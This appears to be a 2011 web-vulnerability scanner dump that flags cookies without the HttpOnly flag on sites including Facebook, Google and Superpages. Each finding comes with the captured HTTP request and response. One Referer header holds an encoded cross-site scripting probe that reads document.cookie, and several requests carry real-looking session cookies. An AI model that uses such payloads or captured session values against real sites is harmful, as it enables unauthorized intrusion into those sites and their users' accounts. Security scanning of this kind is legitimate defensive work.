GET /b/o?id=cD5Q7abi8r4inHadbi-bnq&i=http%3A%2F%2Fa.collective-media.net%2Fadi%2Flb.buzzillions%2F%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bord%3D1296770389%3F&ts=1296770455256 HTTP/1.1 Host: w.ic.tynt.com Proxy-Connection: keep-alive Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 HTTP/1.1 Host: www.buzzillions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.dhgate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Content-Type: text/html Content-Language: zh-CN Date: Thu, 03 Feb 2011 21:48:56 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: vid=rBABeU1LIshUmnTRCKTHAg==; expires=Wed, 29-Jan-31 21:48:56 GMT; path=/ Content-Length: 56077
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conten ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.everycarlisted.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=Al9E9; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=Al9E9; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:20 GMT Content-Length: 30803
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=xRgPt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=xRgPt; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:29 GMT Content-Length: 11422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=wLXVp; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /home.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Location: http://www.facebook.com/login.php P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: lsd=wLXVp; path=/; domain=.facebook.com Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fhome.php; path=/; domain=.facebook.com; httponly Set-Cookie: next_path=%2Fhome.php; path=/; domain=.facebook.com; httponly Content-Type: text/html; charset=utf-8 Connection: close Date: Thu, 03 Feb 2011 21:49:25 GMT Content-Length: 0
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=FMAWt; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pages/Veoh/129836657035793 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;
Response
HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/VeohTV
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=FMAWt; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 21:49:29 GMT
Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /share.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=y_9KTbq--wiemAhPZf9cZRCm; expires=Sat, 02-Feb-2013 19:19:39 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=yNjLf; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fshare.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:39 GMT
Content-Length: 10796
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lsd=bxxex; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /supermediacom HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=yP9KTbiv931zl65aXpcqa4m-; expires=Sat, 02-Feb-2013 19:19:36 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=bxxex; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Thu, 03 Feb 2011 19:19:37 GMT
Content-Length: 146681
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class= ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/ HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:30 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: BX=4kc870h6km8na&b=3&s=0v; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.flickr.com
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Sun, 02-Feb-2014 21:49:30 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Wed, 03-Feb-2010 21:49:29 GMT; path=/; domain=flickr.com
Set-Cookie: search_z=t; expires=Wed, 30-Oct-2013 21:49:30 GMT; path=/; domain=.flickr.com
X-Served-By: www87.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23029
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=p2zNnJZpTnA;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/Login HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The following cookie was issued by the application and does not have the HttpOnly flag set:
GALX=hB-ORbAny80;Path=/accounts;Secure
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /accounts/ServiceLogin HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.inceptor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:20:10 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:35:12 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /online-casino/ HTTP/1.1
Host: www.jackpotcity.com
Proxy-Connection: keep-alive
Referer: http://www.thumbshots.com/Support.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=829c034d40083b97a500eea83e80612d; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:12 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24855
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale-Shower-Faucets_c2863 HTTP/1.1
Host: www.lightinthebox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /in/troyd/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: bcookie="v=1&0cafcf8d-e068-4822-b520-7439b567b823"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:39:36 GMT; Path=/
Last-Modified: Thu, 27 Jan 2011 18:58:16 GMT
If-Modified-Since: Thu, 27 Jan 2011 18:58:16 GMT
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 20:25:29 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.localsearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> The Local Sear ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.milanoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buzz/members/smartdesis/x22 HTTP/1.1
Host: www.mybloglog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:28:24 GMT
Set-Cookie: BX=9fhlkdh6km3v8&b=3&s=1o; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.mybloglog.com
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 7249
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Page Not Found - MyBlogLog</title> <meta http-equiv="Cont ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.omniture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 19:21:03 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.omniture.com ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /specials/sd/buy-sd.htm HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /specials/smartdraw.asp HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:12 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:12 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/social/sln.php HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 302 Found
Date: Thu, 03 Feb 2011 19:35:15 GMT
Server: Unspecified
Vary: Host
Location:
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:15 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:09:25 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: application/javascript
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:24:24 GMT;path=/
var IE = document.all?true:false if (!IE) document.captureEvents(Event.MOUSEMOVE) document.onmousemove = getMouseXY; var tempX = 0 var tempY = 0 function getMouseXY(e) { if (IE) { // grab the x-y po ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /inc/social/soc_email.php/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:14 GMT
Server: Unspecified
Vary: Host
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:14 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /superguarantee/ HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=7E88C67F7FFF85DD8CFB8379B82BF1F4; __unam=c5114f2-12dec4b1cc4-7f15d273-3; SPC=1296748823650-www.superpages.com-30323935-794472; s_sq=%5B%5BB%5D%5D; s_ppv=100; web=; s_cc=true; s_lastvisit=1296754109045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660; s_vi=[CS]v1|26A56898051D3E94-40000129001DB9DD[CE]; yp=; shopping=; s.campaign=comlocal1a;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:35:25 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:50:25 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.supertradeexchange.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13237
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: itex%5Fpersist=anon=Y; expires=Fri, 03-Feb-2012 08:00:00 GMT; domain=www.supertradeexchange.com; path=/
Date: Thu, 03 Feb 2011 19:35:26 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
<title>SuperTradeExchange® - a small business community and barter netwo ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746
